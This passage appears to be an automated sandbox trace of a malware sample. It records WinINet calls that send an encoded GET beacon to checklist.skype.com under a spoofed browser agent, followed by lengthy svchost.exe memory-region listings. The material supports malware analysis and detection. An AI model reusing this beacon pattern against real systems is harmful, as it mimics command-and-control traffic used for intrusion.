lpProcName="InternetOpenA") returned 0x744bbb50 [0316.881] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0317.216] GetProcAddress (hModule=0x74220000, lpProcName="InternetSetStatusCallback") returned 0x74536050 [0317.216] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x1e7b18) returned 0x0 [0317.216] ResetEvent (hEvent=0x2cc) returned 1 [0317.216] GetProcAddress (hModule=0x74220000, lpProcName="InternetConnectA") returned 0x74526e70 [0317.216] InternetConnectA (hInternet=0xcc0004, lpszServerName="checklist.skype.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x8bf79c) returned 0xcc0008 [0317.327] SetEvent (hEvent=0x2cc) returned 1 [0317.327] GetProcAddress (hModule=0x74220000, lpProcName="HttpOpenRequestA") returned 0x745c4200 [0317.327] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x8bf79c) returned 0xcc000c [0317.330] GetProcAddress (hModule=0x74220000, lpProcName="InternetQueryOptionA") returned 0x744d2e80 [0317.330] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x8bf76c, lpdwBufferLength=0x8bf768 | out: lpBuffer=0x8bf76c, lpdwBufferLength=0x8bf768) returned 1 [0317.330] GetProcAddress (hModule=0x74220000, lpProcName="InternetSetOptionA") returned 0x744d4cf0 [0317.330] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x8bf76c*, dwBufferLength=0x4) returned 1 [0317.330] GetProcAddress (hModule=0x74220000, lpProcName="InternetSetOptionA") returned 0x744d4cf0 [0317.331] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x8bf764*, dwBufferLength=0x4) returned 1 [0317.331] GetProcAddress (hModule=0x74220000, lpProcName="InternetSetOptionA") returned 0x744d4cf0 [0317.331] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x8bf764*, dwBufferLength=0x4) returned 1 [0317.331] ResetEvent (hEvent=0x2cc) returned 1 [0317.331] ResetEvent (hEvent=0x2f8) returned 1 [0317.331] GetProcAddress (hModule=0x74220000, lpProcName="HttpSendRequestA") returned 0x745329a0 [0317.331] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0317.333] GetLastError () returned 0x3e5 [0317.333] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) [0317.333] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) returned 0x102 [0317.333] GetProcAddress (hModule=0x74220000, lpProcName="HttpQueryInfoA") returned 0x744d4720 [0317.333] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x8bf7c8, lpdwBufferLength=0x8bf77c, lpdwIndex=0x8bf774*=0x0 | out: lpBuffer=0x8bf7c8*, lpdwBufferLength=0x8bf77c*=0x4, lpdwIndex=0x8bf774*=0x0) returned 1 [0317.333] WaitForMultipleObjects (nCount=0x2, lpHandles=0x8bf754*=0x2cc, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0317.630] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) [0317.630] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) returned 0x0 [0317.630] SetEvent (hEvent=0x2cc) returned 1 [0317.630] WaitForMultipleObjects (nCount=0x2, lpHandles=0x8bf770*=0x2f8, bWaitAll=0, dwMilliseconds=0xea60) Thread: id = 4 os_tid = 0x14dc Thread: id = 77 os_tid = 0x11a4 Thread: id = 78 os_tid = 0x1688 Thread: id = 79 os_tid = 0x168c Thread: id = 91 os_tid = 0x1650 Thread: id = 92 os_tid = 0x1634 [0317.629] SetEvent (hEvent=0x2cc) returned 1 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x206bd000" os_pid = "0x144" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x260" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs -p" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "S-1-5-80-2949785411-1458004381-4011503523-1439849274-3428788682" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "S-1-5-80-1139522462-2689595747-457373284-4037083511-4201549542" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "S-1-5-80-3577588319-513283748-931039988-2701962192-2148388740" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bbce" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 374 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 375 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 376 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 377 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 378 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 379 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 380 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 381 start_va = 0x100000 end_va = 0x108fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 382 start_va = 0x110000 end_va = 0x1d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 383 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wosc.dll.mui" filename = "\\Windows\\System32\\en-US\\wosc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wosc.dll.mui") Region: id = 384 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 385 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 386 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 387 start_va = 0x610000 end_va = 0x611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 388 start_va = 0x680000 end_va = 0x688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 389 start_va = 0x690000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 390 start_va = 0x890000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 391 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 392 start_va = 0xa30000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 393 start_va = 0xb00000 end_va = 0xb00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 394 start_va = 0xb10000 end_va = 0xb18fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 395 start_va = 0xb20000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 396 start_va = 0xb30000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 397 start_va = 0xb40000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 398 start_va = 0xbc0000 end_va = 0xbc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 399 start_va = 0xbd0000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 400 start_va = 0xbe0000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 401 start_va = 0xbf0000 end_va = 0xbf1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wldap32.dll.mui" filename = "\\Windows\\System32\\en-US\\wldap32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wldap32.dll.mui") Region: id = 402 start_va = 0xc00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 403 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 404 start_va = 0xf00000 end_va = 0x1237fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 405 start_va = 0x12c0000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 406 start_va = 0x1340000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 407 start_va = 0x1440000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 408 start_va = 0x15c0000 end_va = 0x15c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015c0000" filename = "" Region: id = 409 start_va = 0x15d0000 end_va = 0x15d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 410 start_va = 0x15e0000 end_va = 0x15e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 411 start_va = 0x15f0000 end_va = 0x15fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 412 start_va = 0x1600000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 413 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 414 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 415 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 416 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 417 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 418 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 419 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 420 start_va = 0x2000000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 421 start_va = 0x2080000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 422 start_va = 0x2180000 end_va = 0x21c8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db") Region: id = 423 start_va = 0x21d0000 end_va = 0x226bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 424 start_va = 0x2270000 end_va = 0x227cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 425 start_va = 0x2280000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 426 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 427 start_va = 0x2310000 end_va = 0x2310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 428 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 429 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 430 start_va = 0x2340000 end_va = 0x2355fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 431 start_va = 0x2360000 end_va = 0x2363fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 432 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 433 start_va = 0x2380000 end_va = 0x2381fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 434 start_va = 0x2390000 end_va = 0x2390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002390000" filename = "" Region: id = 435 start_va = 0x23a0000 end_va = 0x23acfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 436 start_va = 0x23b0000 end_va = 0x23f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023b0000" filename = "" Region: id = 437 start_va = 0x2400000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 438 start_va = 0x2700000 end_va = 0x283efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 439 start_va = 0x2840000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 440 start_va = 0x2940000 end_va = 0x29bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 441 start_va = 0x29c0000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 442 start_va = 0x2ac0000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 443 start_va = 0x2b40000 end_va = 0x2c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 444 start_va = 0x2c40000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 445 start_va = 0x2cc0000 end_va = 0x2ce9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.web.dll.mui" filename = "\\Windows\\System32\\en-US\\Windows.Web.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.web.dll.mui") Region: id = 446 start_va = 0x2e40000 end_va = 0x2ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 447 start_va = 0x2ec0000 end_va = 0x2fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 448 start_va = 0x2fc0000 end_va = 0x30bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 449 start_va = 0x30c0000 end_va = 0x31bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 450 start_va = 0x33c0000 end_va = 0x34bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 451 start_va = 0x35c0000 end_va = 0x36bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 452 start_va = 0x36c0000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 453 start_va = 0x37c0000 end_va = 0x37c7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 454 start_va = 0x37d0000 end_va = 0x37d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037d0000" filename = "" Region: id = 455 start_va = 0x37e0000 end_va = 0x37e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 456 start_va = 0x37f0000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 457 start_va = 0x3800000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 458 start_va = 0x3b80000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 459 start_va = 0x3c80000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 460 start_va = 0x3d80000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 461 start_va = 0x3e80000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 462 start_va = 0x3f80000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f80000" filename = "" Region: id = 463 start_va = 0x4000000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 464 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 465 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 466 start_va = 0x4500000 end_va = 0x4500fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shcore.dll.mui" filename = "\\Windows\\System32\\en-US\\SHCore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shcore.dll.mui") Region: id = 467 start_va = 0x4510000 end_va = 0x460ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 468 start_va = 0x4610000 end_va = 0x4611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004610000" filename = "" Region: id = 469 start_va = 0x4620000 end_va = 0x4620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 470 start_va = 0x4630000 end_va = 0x4630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 471 start_va = 0x4640000 end_va = 0x4643fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 472 start_va = 0x4650000 end_va = 0x4651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 473 start_va = 0x4660000 end_va = 0x4660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 474 start_va = 0x4670000 end_va = 0x4673fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 475 start_va = 0x4680000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 476 start_va = 0x46a0000 end_va = 0x46a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 477 start_va = 0x46b0000 end_va = 0x46b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 478 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 479 start_va = 0x46d0000 end_va = 0x46dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 480 start_va = 0x46e0000 end_va = 0x46effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 481 start_va = 0x46f0000 end_va = 0x46fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 482 start_va = 0x4800000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 483 start_va = 0x4a00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 484 start_va = 0x4c00000 end_va = 0x4c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 485 start_va = 0x4c90000 end_va = 0x4c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c90000" filename = "" Region: id = 486 start_va = 0x4ca0000 end_va = 0x4caffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ca0000" filename = "" Region: id = 487 start_va = 0x4cb0000 end_va = 0x4cbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cb0000" filename = "" Region: id = 488 start_va = 0x4cc0000 end_va = 0x4ccffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cc0000" filename = "" Region: id = 489 start_va = 0x4cd0000 end_va = 0x4cdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cd0000" filename = "" Region: id = 490 start_va = 0x4ce0000 end_va = 0x4ceffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ce0000" filename = "" Region: id = 491 start_va = 0x4d00000 end_va = 0x4d09fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "combase.dll.mui" filename = "\\Windows\\System32\\en-US\\combase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\combase.dll.mui") Region: id = 492 start_va = 0x4e00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 493 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 494 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 495 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 496 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 497 start_va = 0x5400000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 498 start_va = 0x5480000 end_va = 0x5551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005480000" filename = "" Region: id = 499 start_va = 0x5560000 end_va = 0x5631fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005560000" filename = "" Region: id = 500 start_va = 0x5640000 end_va = 0x564ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005640000" filename = "" Region: id = 501 start_va = 0x5650000 end_va = 0x565ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005650000" filename = "" Region: id = 502 start_va = 0x5660000 end_va = 0x566ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005660000" filename = "" Region: id = 503 start_va = 0x5670000 end_va = 0x567ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005670000" filename = "" Region: id = 504 start_va = 0x5680000 end_va = 0x568ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005680000" filename = "" Region: id = 505 start_va = 0x5690000 end_va = 0x569ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005690000" filename = "" Region: id = 506 start_va = 0x56a0000 end_va = 0x669ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056a0000" filename = "" Region: id = 507 start_va = 0x66c0000 end_va = 0x66d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "esent.dll.mui" filename = 